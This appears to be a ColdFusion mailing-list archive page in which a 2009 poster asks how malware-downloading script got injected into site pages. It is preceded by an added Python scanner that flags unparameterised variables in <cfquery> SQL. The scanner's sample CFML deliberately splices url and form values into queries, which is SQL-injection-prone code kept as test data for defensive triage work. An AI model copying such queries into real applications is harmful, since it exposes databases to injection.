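Brad's advice to run a queryparam scanner, as an added example in Python (mine, not Brad's or any published scanner): find every #...# interpolation inside a <cfquery> body that is not wrapped in <cfqueryparam>, and rank it by whether the scope is something an HTTP client controls. The CFML is constructed for the example; its second query shows the parameterised form the others should be rewritten to, and the third shows why a table name pulled from a variable still deserves a look even though it is not a request scope.

```python
"""Flag unparameterised variable interpolation inside <cfquery> bodies.

Added example for this thread; not Brad's or any published queryparam scanner.
SAMPLE_CFML is constructed here: two queries splice url/form scopes straight
into SQL, one uses <cfqueryparam>.
"""
import re

SAMPLE_CFML = """<cfquery name="getUser" datasource="#application.dsn#">
    SELECT id, name FROM users
    WHERE id = #url.id#
      AND status = '#form.status#'
</cfquery>

<cfquery name="getOrder" datasource="#application.dsn#">
    SELECT * FROM orders
    WHERE id = <cfqueryparam value="#url.id#" cfsqltype="cf_sql_integer">
</cfquery>

<cfquery name="getPage" datasource="#application.dsn#">
    SELECT body FROM #variables.pageTable# WHERE slug = '#url.slug#'
</cfquery>
"""

CFQUERY = re.compile(r"<cfquery\b[^>]*>(.*?)</cfquery>", re.IGNORECASE | re.DOTALL)
CFQUERYPARAM = re.compile(r"<cfqueryparam\b[^>]*>", re.IGNORECASE | re.DOTALL)
INTERP = re.compile(r"#([^#\n]+)#")
# Scopes an HTTP client controls. Others (variables., application.) still go
# into the SQL unescaped and are reported for review at lower priority.
TAINTED = re.compile(r"^\s*(form|url|cookie|cgi|arguments|attributes)\.", re.IGNORECASE)


def unparameterized(cfml):
    """Return (line, expression, severity) for each #expr# in a query body that is
    not inside a <cfqueryparam> tag. severity is 'tainted' for user-controlled
    scopes and 'review' for everything else."""
    findings = []
    for query in CFQUERY.finditer(cfml):
        body = query.group(1)
        # Blank out cfqueryparam tags with same-length padding so offsets hold
        # and their own value="#form.x#" is not reported.
        visible = CFQUERYPARAM.sub(lambda m: " " * len(m.group(0)), body)
        for hit in INTERP.finditer(visible):
            expr = hit.group(1).strip()
            line = cfml.count("\n", 0, query.start(1) + hit.start()) + 1
            severity = "tainted" if TAINTED.match(expr) else "review"
            findings.append((line, expr, severity))
    return findings


def scan_files(paths):
    """Run over .cfm/.cfc files; return {path: findings} for the files with hits."""
    report = {}
    for path in paths:
        with open(path, "rb") as fh:
            text = fh.read().decode("latin-1")   # byte-preserving read
        found = unparameterized(text)
        if found:
            report[path] = found
    return report


if __name__ == "__main__":
    for line, expr, severity in unparameterized(SAMPLE_CFML):
        print(f"line {line:>3}  {severity:<8} #{expr}#")
```

A regex scanner like this is a triage aid, not a proof: it misses SQL assembled in a string before the <cfquery> and it cannot tell a #url.id# that was validated with isNumeric() upstream from one that was not. Every 'tainted' hit should end up as a <cfqueryparam> with an explicit cfsqltype; the 'review' hits need a human to confirm the value can never come from a request.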


Question about hack

2009-04-06 Thread Nick Gleason

Hi there.  We've just seen a hack attempt that we haven't seen before and I
wanted to get feedback.

The symptom is that some script code is inserted at the bottom of certain
pages (e.g. index.cfm).  The script (which has been scrubbed) looks like
this:
 

The script downloads malware, which we obviously want to prevent.  We're
trying to determine how it's getting in there, whether through an old site
with inadequate code or the OS or something else.  Any thoughts?

This is on a server running IIS 6 / CF7.

Thanks in advance,

Nick



Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321353